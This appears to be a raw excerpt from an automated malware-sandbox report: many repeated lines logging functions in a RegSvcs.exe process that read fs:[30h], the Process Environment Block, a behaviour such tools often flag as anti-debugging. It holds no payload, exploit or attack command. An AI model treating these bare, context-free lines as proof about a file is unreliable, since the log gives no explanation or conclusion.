Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019202A0 mov eax, dword ptr fs:[00000030h]	9_2_019202A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019202A0 mov eax, dword ptr fs:[00000030h]	9_2_019202A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019A62A0 mov eax, dword ptr fs:[00000030h]	9_2_019A62A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019A62A0 mov ecx, dword ptr fs:[00000030h]	9_2_019A62A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019A62A0 mov eax, dword ptr fs:[00000030h]	9_2_019A62A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019A62A0 mov eax, dword ptr fs:[00000030h]	9_2_019A62A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019A62A0 mov eax, dword ptr fs:[00000030h]	9_2_019A62A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019A62A0 mov eax, dword ptr fs:[00000030h]	9_2_019A62A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0191A2C3 mov eax, dword ptr fs:[00000030h]	9_2_0191A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0191A2C3 mov eax, dword ptr fs:[00000030h]	9_2_0191A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0191A2C3 mov eax, dword ptr fs:[00000030h]	9_2_0191A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0191A2C3 mov eax, dword ptr fs:[00000030h]	9_2_0191A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0191A2C3 mov eax, dword ptr fs:[00000030h]	9_2_0191A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019202E1 mov eax, dword ptr fs:[00000030h]	9_2_019202E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019202E1 mov eax, dword ptr fs:[00000030h]	9_2_019202E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019202E1 mov eax, dword ptr fs:[00000030h]	9_2_019202E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0190823B mov eax, dword ptr fs:[00000030h]	9_2_0190823B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0190A250 mov eax, dword ptr fs:[00000030h]	9_2_0190A250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01916259 mov eax, dword ptr fs:[00000030h]	9_2_01916259
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019CA250 mov eax, dword ptr fs:[00000030h]	9_2_019CA250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019CA250 mov eax, dword ptr fs:[00000030h]	9_2_019CA250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01998243 mov eax, dword ptr fs:[00000030h]	9_2_01998243
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01998243 mov ecx, dword ptr fs:[00000030h]	9_2_01998243
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019C0274 mov eax, dword ptr fs:[00000030h]	9_2_019C0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019C0274 mov eax, dword ptr fs:[00000030h]	9_2_019C0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019C0274 mov eax, dword ptr fs:[00000030h]	9_2_019C0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019C0274 mov eax, dword ptr fs:[00000030h]	9_2_019C0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019C0274 mov eax, dword ptr fs:[00000030h]	9_2_019C0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019C0274 mov eax, dword ptr fs:[00000030h]	9_2_019C0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019C0274 mov eax, dword ptr fs:[00000030h]	9_2_019C0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019C0274 mov eax, dword ptr fs:[00000030h]	9_2_019C0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019C0274 mov eax, dword ptr fs:[00000030h]	9_2_019C0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019C0274 mov eax, dword ptr fs:[00000030h]	9_2_019C0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019C0274 mov eax, dword ptr fs:[00000030h]	9_2_019C0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019C0274 mov eax, dword ptr fs:[00000030h]	9_2_019C0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01914260 mov eax, dword ptr fs:[00000030h]	9_2_01914260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01914260 mov eax, dword ptr fs:[00000030h]	9_2_01914260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01914260 mov eax, dword ptr fs:[00000030h]	9_2_01914260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0190826B mov eax, dword ptr fs:[00000030h]	9_2_0190826B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0194E59C mov eax, dword ptr fs:[00000030h]	9_2_0194E59C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01912582 mov eax, dword ptr fs:[00000030h]	9_2_01912582
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01912582 mov ecx, dword ptr fs:[00000030h]	9_2_01912582
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01944588 mov eax, dword ptr fs:[00000030h]	9_2_01944588
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019345B1 mov eax, dword ptr fs:[00000030h]	9_2_019345B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019345B1 mov eax, dword ptr fs:[00000030h]	9_2_019345B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019905A7 mov eax, dword ptr fs:[00000030h]	9_2_019905A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019905A7 mov eax, dword ptr fs:[00000030h]	9_2_019905A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019905A7 mov eax, dword ptr fs:[00000030h]	9_2_019905A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019165D0 mov eax, dword ptr fs:[00000030h]	9_2_019165D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0194A5D0 mov eax, dword ptr fs:[00000030h]	9_2_0194A5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0194A5D0 mov eax, dword ptr fs:[00000030h]	9_2_0194A5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0194E5CF mov eax, dword ptr fs:[00000030h]	9_2_0194E5CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0194E5CF mov eax, dword ptr fs:[00000030h]	9_2_0194E5CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019125E0 mov eax, dword ptr fs:[00000030h]	9_2_019125E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0193E5E7 mov eax, dword ptr fs:[00000030h]	9_2_0193E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0193E5E7 mov eax, dword ptr fs:[00000030h]	9_2_0193E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0193E5E7 mov eax, dword ptr fs:[00000030h]	9_2_0193E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0193E5E7 mov eax, dword ptr fs:[00000030h]	9_2_0193E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0193E5E7 mov eax, dword ptr fs:[00000030h]	9_2_0193E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0193E5E7 mov eax, dword ptr fs:[00000030h]	9_2_0193E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0193E5E7 mov eax, dword ptr fs:[00000030h]	9_2_0193E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0193E5E7 mov eax, dword ptr fs:[00000030h]	9_2_0193E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0194C5ED mov eax, dword ptr fs:[00000030h]	9_2_0194C5ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0194C5ED mov eax, dword ptr fs:[00000030h]	9_2_0194C5ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019A6500 mov eax, dword ptr fs:[00000030h]	9_2_019A6500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019E4500 mov eax, dword ptr fs:[00000030h]	9_2_019E4500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019E4500 mov eax, dword ptr fs:[00000030h]	9_2_019E4500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019E4500 mov eax, dword ptr fs:[00000030h]	9_2_019E4500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019E4500 mov eax, dword ptr fs:[00000030h]	9_2_019E4500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019E4500 mov eax, dword ptr fs:[00000030h]	9_2_019E4500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019E4500 mov eax, dword ptr fs:[00000030h]	9_2_019E4500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019E4500 mov eax, dword ptr fs:[00000030h]	9_2_019E4500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01920535 mov eax, dword ptr fs:[00000030h]	9_2_01920535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01920535 mov eax, dword ptr fs:[00000030h]	9_2_01920535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01920535 mov eax, dword ptr fs:[00000030h]	9_2_01920535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01920535 mov eax, dword ptr fs:[00000030h]	9_2_01920535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01920535 mov eax, dword ptr fs:[00000030h]	9_2_01920535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01920535 mov eax, dword ptr fs:[00000030h]	9_2_01920535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0193E53E mov eax, dword ptr fs:[00000030h]	9_2_0193E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0193E53E mov eax, dword ptr fs:[00000030h]	9_2_0193E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0193E53E mov eax, dword ptr fs:[00000030h]	9_2_0193E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0193E53E mov eax, dword ptr fs:[00000030h]	9_2_0193E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0193E53E mov eax, dword ptr fs:[00000030h]	9_2_0193E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01918550 mov eax, dword ptr fs:[00000030h]	9_2_01918550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01918550 mov eax, dword ptr fs:[00000030h]	9_2_01918550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0194656A mov eax, dword ptr fs:[00000030h]	9_2_0194656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0194656A mov eax, dword ptr fs:[00000030h]	9_2_0194656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0194656A mov eax, dword ptr fs:[00000030h]	9_2_0194656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019CA49A mov eax, dword ptr fs:[00000030h]	9_2_019CA49A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019444B0 mov ecx, dword ptr fs:[00000030h]	9_2_019444B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0199A4B0 mov eax, dword ptr fs:[00000030h]	9_2_0199A4B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019164AB mov eax, dword ptr fs:[00000030h]	9_2_019164AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019104E5 mov ecx, dword ptr fs:[00000030h]	9_2_019104E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01948402 mov eax, dword ptr fs:[00000030h]	9_2_01948402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01948402 mov eax, dword ptr fs:[00000030h]	9_2_01948402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01948402 mov eax, dword ptr fs:[00000030h]	9_2_01948402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0194A430 mov eax, dword ptr fs:[00000030h]	9_2_0194A430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0190E420 mov eax, dword ptr fs:[00000030h]	9_2_0190E420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0190E420 mov eax, dword ptr fs:[00000030h]	9_2_0190E420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0190E420 mov eax, dword ptr fs:[00000030h]	9_2_0190E420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0190C427 mov eax, dword ptr fs:[00000030h]	9_2_0190C427
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01996420 mov eax, dword ptr fs:[00000030h]	9_2_01996420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01996420 mov eax, dword ptr fs:[00000030h]	9_2_01996420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01996420 mov eax, dword ptr fs:[00000030h]	9_2_01996420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01996420 mov eax, dword ptr fs:[00000030h]	9_2_01996420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01996420 mov eax, dword ptr fs:[00000030h]	9_2_01996420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01996420 mov eax, dword ptr fs:[00000030h]	9_2_01996420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01996420 mov eax, dword ptr fs:[00000030h]	9_2_01996420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0193245A mov eax, dword ptr fs:[00000030h]	9_2_0193245A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019CA456 mov eax, dword ptr fs:[00000030h]	9_2_019CA456
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0190645D mov eax, dword ptr fs:[00000030h]	9_2_0190645D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0194E443 mov eax, dword ptr fs:[00000030h]	9_2_0194E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0194E443 mov eax, dword ptr fs:[00000030h]	9_2_0194E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0194E443 mov eax, dword ptr fs:[00000030h]	9_2_0194E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0194E443 mov eax, dword ptr fs:[00000030h]	9_2_0194E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0194E443 mov eax, dword ptr fs:[00000030h]	9_2_0194E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0194E443 mov eax, dword ptr fs:[00000030h]	9_2_0194E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0194E443 mov eax, dword ptr fs:[00000030h]	9_2_0194E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0194E443 mov eax, dword ptr fs:[00000030h]	9_2_0194E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0193A470 mov eax, dword ptr fs:[00000030h]	9_2_0193A470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0193A470 mov eax, dword ptr fs:[00000030h]	9_2_0193A470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0193A470 mov eax, dword ptr fs:[00000030h]	9_2_0193A470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0199C460 mov ecx, dword ptr fs:[00000030h]	9_2_0199C460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019B678E mov eax, dword ptr fs:[00000030h]	9_2_019B678E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019C47A0 mov eax, dword ptr fs:[00000030h]	9_2_019C47A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019107AF mov eax, dword ptr fs:[00000030h]	9_2_019107AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0191C7C0 mov eax, dword ptr fs:[00000030h]	9_2_0191C7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019907C3 mov eax, dword ptr fs:[00000030h]	9_2_019907C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019147FB mov eax, dword ptr fs:[00000030h]	9_2_019147FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019147FB mov eax, dword ptr fs:[00000030h]	9_2_019147FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0199E7E1 mov eax, dword ptr fs:[00000030h]	9_2_0199E7E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019327ED mov eax, dword ptr fs:[00000030h]	9_2_019327ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019327ED mov eax, dword ptr fs:[00000030h]	9_2_019327ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019327ED mov eax, dword ptr fs:[00000030h]	9_2_019327ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01910710 mov eax, dword ptr fs:[00000030h]	9_2_01910710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01940710 mov eax, dword ptr fs:[00000030h]	9_2_01940710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0194C700 mov eax, dword ptr fs:[00000030h]	9_2_0194C700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0194273C mov eax, dword ptr fs:[00000030h]	9_2_0194273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0194273C mov ecx, dword ptr fs:[00000030h]	9_2_0194273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0194273C mov eax, dword ptr fs:[00000030h]	9_2_0194273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0198C730 mov eax, dword ptr fs:[00000030h]	9_2_0198C730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0194C720 mov eax, dword ptr fs:[00000030h]	9_2_0194C720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0194C720 mov eax, dword ptr fs:[00000030h]	9_2_0194C720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01910750 mov eax, dword ptr fs:[00000030h]	9_2_01910750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0199E75D mov eax, dword ptr fs:[00000030h]	9_2_0199E75D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01952750 mov eax, dword ptr fs:[00000030h]	9_2_01952750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01952750 mov eax, dword ptr fs:[00000030h]	9_2_01952750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01994755 mov eax, dword ptr fs:[00000030h]	9_2_01994755
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0194674D mov esi, dword ptr fs:[00000030h]	9_2_0194674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0194674D mov eax, dword ptr fs:[00000030h]	9_2_0194674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0194674D mov eax, dword ptr fs:[00000030h]	9_2_0194674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01918770 mov eax, dword ptr fs:[00000030h]	9_2_01918770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01920770 mov eax, dword ptr fs:[00000030h]	9_2_01920770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01920770 mov eax, dword ptr fs:[00000030h]	9_2_01920770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01920770 mov eax, dword ptr fs:[00000030h]	9_2_01920770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01920770 mov eax, dword ptr fs:[00000030h]	9_2_01920770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01920770 mov eax, dword ptr fs:[00000030h]	9_2_01920770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01920770 mov eax, dword ptr fs:[00000030h]	9_2_01920770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01920770 mov eax, dword ptr fs:[00000030h]	9_2_01920770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01920770 mov eax, dword ptr fs:[00000030h]	9_2_01920770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01920770 mov eax, dword ptr fs:[00000030h]	9_2_01920770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01920770 mov eax, dword ptr fs:[00000030h]	9_2_01920770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01920770 mov eax, dword ptr fs:[00000030h]	9_2_01920770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01920770 mov eax, dword ptr fs:[00000030h]	9_2_01920770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01914690 mov eax, dword ptr fs:[00000030h]	9_2_01914690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01914690 mov eax, dword ptr fs:[00000030h]	9_2_01914690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019466B0 mov eax, dword ptr fs:[00000030h]	9_2_019466B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0194C6A6 mov eax, dword ptr fs:[00000030h]	9_2_0194C6A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0194A6C7 mov ebx, dword ptr fs:[00000030h]	9_2_0194A6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0194A6C7 mov eax, dword ptr fs:[00000030h]	9_2_0194A6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019906F1 mov eax, dword ptr fs:[00000030h]	9_2_019906F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019906F1 mov eax, dword ptr fs:[00000030h]	9_2_019906F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0198E6F2 mov eax, dword ptr fs:[00000030h]	9_2_0198E6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0198E6F2 mov eax, dword ptr fs:[00000030h]	9_2_0198E6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0198E6F2 mov eax, dword ptr fs:[00000030h]	9_2_0198E6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0198E6F2 mov eax, dword ptr fs:[00000030h]	9_2_0198E6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01952619 mov eax, dword ptr fs:[00000030h]	9_2_01952619
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0198E609 mov eax, dword ptr fs:[00000030h]	9_2_0198E609
